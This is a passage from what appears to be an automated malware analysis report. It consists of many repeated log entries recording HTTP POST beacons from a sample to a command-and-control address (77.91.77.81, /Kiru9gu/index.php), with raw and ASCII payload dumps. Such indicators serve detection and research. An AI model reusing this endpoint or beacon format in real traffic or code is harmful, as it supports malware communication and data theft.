r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: 